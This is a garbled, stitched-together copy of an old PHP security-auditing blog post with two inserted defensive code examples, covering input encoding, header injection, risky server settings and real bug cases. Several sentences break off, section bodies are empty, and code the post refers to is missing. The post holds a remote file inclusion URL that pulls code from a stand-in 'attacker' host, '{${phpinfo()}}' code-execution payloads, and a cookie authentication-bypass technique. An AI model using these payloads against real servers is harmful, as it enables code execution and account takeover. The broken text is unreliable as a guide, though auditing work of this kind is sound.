From: http://www.abysssec.com/blog/2010/03/attention-in-

or > or >.

HTML encoding should be used for output handling, where user input has to be reflected in HTML without injecting code (see also htmlentities()).

URL encoding makes sure that every character not allowed within URLs according to RFC 1738 is properly encoded, e.g. a space becomes + or %20, and

IV - Configuration: programming errors, including errors in the program logic.

Well, we know there are 4 points that can help us in the process:

1 - Our

chr(127) into numeric HTML entities.
- FILTER_SANITIZE_EMAIL: removes all characters not commonly used in an email address.
- FILTER_SANITIZE_URL: removes all characters not allowed in URLs.
- FILTER_SANITIZE_NUMBER_INT: removes all characters except digits and + -.
- FILTER_SANITIZE_NUMBER_FLOAT: removes all characters not allowed in floating point numbers.
- FILTER_SANITIZE_MAGIC_QUOTES: applies addslashes().

Other filters:
- FILTER_UNSAFE_RAW: is a dummy filter.
- FILTER_CALLBACK: calls a userspace callback function defining the filter.

D) HTTP Header Output

HTTP headers can be set using the header() function. User input should always be checked before being passed to header(), otherwise a number of security issues become relevant. Newline characters should never be used with header(), in order to prevent HTTP header injection. Injected headers can be used for XSS and HTTP response splitting attacks, too. In general, user input should be handled in a context-sensitive manner. Dynamic content within parameters to Location or Set-Cookie headers should be escaped by urlencode(). For other HTTP header parameters, unintended context changes must be prevented as well; e.g. a semicolon separates several parameters within Content-Type.

Applications should not allow arbitrary HTTP Location redirects, since these can be used for phishing attacks.
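The rules of section D) in working form, as an added example that is not code from the original post: it assumes PHP 8, a whitelist constant ALLOWED_REDIRECT_HOSTS, the function names safeRedirectTarget() and userCookieHeader(), and the request parameters next and lang, all of which are constructed for the example.

```php
<?php
// Added example, not code from the original post: context-sensitive handling of
// user input that ends up in HTTP headers, following the rules in section D).
// ALLOWED_REDIRECT_HOSTS, the function names and the sample inputs are constructed.
declare(strict_types=1);

// Hosts this application may redirect to (constructed for the example).
const ALLOWED_REDIRECT_HOSTS = ['www.example.com', 'shop.example.com'];

// Return a Location target that is safe to send: a same-site absolute path, or an
// http(s) URL whose host is on the whitelist. Anything else becomes $fallback.
function safeRedirectTarget(string $userSupplied, string $fallback = '/'): string
{
    // A CR or LF in the value is what makes header injection and response
    // splitting possible; refuse such values instead of trying to clean them.
    if (preg_match('/[\r\n]/', $userSupplied) === 1) {
        return $fallback;
    }
    $parts = parse_url($userSupplied);
    if ($parts === false) {
        return $fallback;
    }
    if (!isset($parts['host'])) {
        // No host: accept only a plain absolute path. "//host/..." is parsed with
        // a host and handled below; "javascript:..." carries a scheme and is refused.
        $path = $parts['path'] ?? '';
        if (isset($parts['scheme']) || $path === '' || $path[0] !== '/') {
            return $fallback;
        }
        return $userSupplied;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true)) {
        return $fallback;
    }
    // parse_url() puts "user@" in 'user', so "https://www.example.com@evil.example/"
    // has host evil.example and is rejected here.
    if (!in_array(strtolower($parts['host']), ALLOWED_REDIRECT_HOSTS, true)) {
        return $fallback;
    }
    return $userSupplied;
}

// A Set-Cookie header whose value comes from user input: urlencode() keeps ";",
// "," and whitespace from turning into extra cookie attributes, and the name is
// restricted to a safe character set.
function userCookieHeader(string $name, string $userValue): string
{
    if (preg_match('/^[A-Za-z0-9_-]+$/', $name) !== 1) {
        throw new InvalidArgumentException('invalid cookie name');
    }
    return 'Set-Cookie: ' . $name . '=' . urlencode($userValue) . '; Path=/; HttpOnly';
}

// Request handling; the parameter names are assumed.
header('Location: ' . safeRedirectTarget($_GET['next'] ?? ''));
header(userCookieHeader('lang', $_GET['lang'] ?? 'en'));

// Constructed inputs showing which redirect targets survive the check.
$samples = [
    '/account',
    'https://shop.example.com/cart',
    'https://www.example.com@evil.example/',
    '//evil.example/',
    'javascript:alert(1)',
    "/account\r\nSet-Cookie: session=x",
];
foreach ($samples as $next) {
    echo json_encode($next), ' -> ', safeRedirectTarget($next), PHP_EOL;
}
```

header() itself has refused a value containing a newline since PHP 5.1.2; the explicit check makes the rejection part of the application's own validation rather than a warning at send time. setcookie() applies urlencode() to its value automatically, while setrawcookie() does not, so the latter needs the same care as a hand-built Set-Cookie header.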
In addition, open redirects can have a negative impact on the cross domain policy infrastructure of Adobe's Flash Player.

E) Secure File Handling

- Detect and replace NULL bytes:

- Prevent remote file inclusion (path prefix) and directory traversal (basename):

- Include only whitelisted files:

3) Configuration point

The last point: weaknesses in the programming (source code) structure, one of the most clever parts of source code auditing. We see the following configuration in code or in the php.ini settings:

[a] The server does not disable remote URLs for file handling functions: File handling functions like fopen, file_get_contents, and include accept URLs as file parameters (for example: fopen('http://www.example.com/', 'r')). Even though this enables developers to access remote resources like HTTP URLs, it poses a huge security risk if the filename is taken from user input without proper sanitization, and opens the door to remote code execution on the server.

[b] Register Globals is 'ON': Prior to version 4.2.0, PHP used to provide input values as global variables. This feature was named register_globals, and it was responsible for many security issues in web applications because it allowed attackers to freely manipulate global variables in many situations. Fortunately it is disabled by default from PHP 4.2.0 on, because it is dangerous on so many levels.

Demonstration: http://path/inc/step_two_tables.php?server_inc=http://attacker/js_functions.php

[c] The server does not limit access to certain file name patterns: Many file extensions should not be accessible by end users. Take for example .inc. Some developers prefer to assign this extension to included scripts.
The problem here is that this extension isn't parsed by the PHP engine, and as a result, anyone can view the source code by requesting the file itself: http://www.example.com/includes/settings.inc Such files may contain sensitive data like MySQL passwords, so you need to ensure that end users cannot access those files. Other candidate extensions are .sql, .mysql, and .pgsql.

Another pattern to look out for is backup files. Some editors create backup versions of edited files in the same directory where the original file is located. For example, if you edit index.php, a backup called index.php~ will be created. Given that this file doesn't end with .php, it will not be processed by the PHP engine, and its code will also be available to users by requesting http://www.example.com/index.php~

[d] Error messages and logging are ON: By default, PHP prints error messages to the browser's output. While this is desirable during the development process, it may reveal security information to users, like installation paths or usernames. And many other attacks, usually introduced by the programmer!

Real World Examples

Exp 1: PHP Code Execution

There is an arbitrary PHP code execution issue due to the unsafe use of preg_replace evaluation when parsing anchor tags and the like.

PHP code execution is possible via complex variable evaluation:

[:nom:{${phpinfo()}}]

Or this code:

Abuse: [email]{${phpinfo()}}[/email]

2- Configuration mistake: Authentication Bypass

There is a serious flaw in the Jamroom (JamRoom

The problem with the above code is that $_val is a user supplied value taken from $_COOKIE['JMU_Cookie']. Since the cookie data is serialized, an attacker can specify data types such as boolean values, bypass the password check, and authenticate with only a username.
If the first byte of the password hash stored in the database is numerical, then a boolean value of true can be used in place of an actual password, and if the first byte is a letter, then a boolean value of false is required.

The above script is an example of how it works, and will create a cookie to log in as the user admin. For more information check out the comparison operators section of the PHP manual, specifically the "identical" operator.

3- New bug: http://www.sektioneins.com/en/advisories/advisory-022009-phpids-unserialize-vulnerability/index.html

In another post, I will publish some of our most recent research on browser security and the results we got on this topic, as I promised in a few past posts.

Regards,
daphne
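The serialized-cookie comparison flaw described in the Jamroom section above, shown as an added example that is neither the JamRoom code nor the post's own script: the user table, the cookie layout and the function names storedHashFor(), loginVulnerable() and loginHardened() are constructed for the example, and PHP 8 is assumed.

```php
<?php
// Added example, not the JamRoom code from the post: a cookie login check with the
// loose comparison the post describes, beside a hardened version. The user table,
// hash, cookie layout and function names are constructed.
declare(strict_types=1);

// Constructed "database": username => stored credential hash. A real application
// would read this from its user table.
function storedHashFor(string $user): ?string
{
    $users = ['admin' => hash('sha256', 'constructed-secret-for-admin')];
    return $users[$user] ?? null;
}

// Vulnerable pattern: the cookie is unserialize()d and its second element is
// compared to the stored hash with ==. If that element is the boolean true, PHP
// compares both sides as booleans, and any non-empty hash string is "equal".
function loginVulnerable(string $cookie): bool
{
    $data = @unserialize($cookie);
    if (!is_array($data) || count($data) !== 2) {
        return false;
    }
    [$user, $val] = $data;
    $stored = is_string($user) ? storedHashFor($user) : null;
    return $stored !== null && $val == $stored;
}

// Hardened pattern:
//  1. never unserialize() attacker-controlled data; json_decode() yields only
//     arrays (or stdClass), never application objects with magic methods;
//  2. enforce the type of every field before using it;
//  3. compare with a strict, constant-time function that only accepts strings.
function loginHardened(string $cookie): bool
{
    $data = json_decode($cookie, true);
    if (!is_array($data) || !isset($data['user'], $data['val'])) {
        return false;
    }
    if (!is_string($data['user']) || !is_string($data['val'])) {
        return false;
    }
    $stored = storedHashFor($data['user']);
    if ($stored === null) {
        return false;
    }
    return hash_equals($stored, $data['val']);
}

// Constructed cookies: the genuine one carries the real hash, the tampered one
// carries the boolean true (serialized as "b:1;") in its place.
function demo(): array
{
    $stored  = storedHashFor('admin');
    $goodOld = serialize(['admin', $stored]);
    $badOld  = serialize(['admin', true]);
    $goodNew = json_encode(['user' => 'admin', 'val' => $stored]);
    $badNew  = json_encode(['user' => 'admin', 'val' => true]);
    return [
        'vulnerable, genuine cookie'  => loginVulnerable($goodOld),
        'vulnerable, tampered cookie' => loginVulnerable($badOld),
        'hardened, genuine cookie'    => loginHardened($goodNew),
        'hardened, tampered cookie'   => loginHardened($badNew),
    ];
}

foreach (demo() as $case => $ok) {
    echo str_pad($case, 30), $ok ? 'logged in' : 'rejected', PHP_EOL;
}
```

The == in loginVulnerable() is the whole bug: once one side is a boolean, PHP converts the other side to a boolean as well, and a non-empty hash string is true. Replacing it with === or, for secrets, hash_equals() on two values already verified to be strings closes that path, and decoding the cookie as JSON instead of with unserialize() means no application object can be instantiated from attacker-controlled bytes.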
09-19 00:40